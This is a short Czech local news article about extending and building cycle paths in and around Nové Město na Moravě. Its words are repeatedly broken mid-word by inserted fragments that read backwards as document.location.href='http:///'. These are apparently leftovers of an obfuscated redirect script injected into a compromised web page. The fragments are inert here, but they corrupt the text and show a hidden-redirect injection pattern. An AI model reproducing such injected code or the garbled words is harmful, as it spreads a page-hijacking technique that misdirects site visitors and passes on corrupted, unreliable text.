Rainbow page separator

V Novém Městě a jeho okolí přibývají trasy pro cyklisty

Pondělí, 16. srpna 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Rozšířit cyklostezku u firmy Medin hodlá novoměstská radnice. Stejně tak měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to začíná pracovat na rozšíření cyklostezky od Hotelu Ski do Vlachovic; záměr se aktuálně nachází ve fázi zpracování studie. Projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová dokumentace je oproti [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu již připravená pro stezku pro cyklisty z Nového Města do osady Jiříkovice. Trasa vede i přes pozemky obce Radňovice, která se k záměru přidala.
Aktuálně v Novém Městě probíhají stavební práce na vybudování cyklostezky z Nečasovy ulice ve směru k ulici Petrovická. Příští rok je pak naplánováno pokračování stezky od garáží v Nečasově ulici směrem ke Kazmírovu rybníku a dále do ulice Německého. Záměrem rozvoje cyklodopravy je odvést cyklisty z frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaných silnic v Novém Městě a jeho nejbližším okolí a zvýšit tím jejich bezpečnost.